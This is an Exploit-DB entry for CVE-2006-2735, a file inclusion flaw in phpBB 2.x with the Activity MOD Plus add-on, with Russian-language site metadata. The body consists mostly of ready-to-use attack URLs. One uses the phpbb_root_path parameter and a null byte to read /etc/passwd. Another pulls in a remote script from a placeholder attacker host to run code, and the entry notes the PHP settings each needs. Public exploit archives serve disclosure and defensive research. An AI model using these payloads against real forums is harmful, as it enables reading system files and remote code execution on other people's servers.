- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1844
- Проверка EDB
-
- Пройдено
- Автор
- NUKEDX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-2735
- Дата публикации
- 2006-05-28
Код:
phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
Contacts > ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com
This exploits works on phpBB 2.x (Activity MOD Plus)
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38
Succesful exploitation needs register_globals on
GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
- Источник
- www.exploit-db.com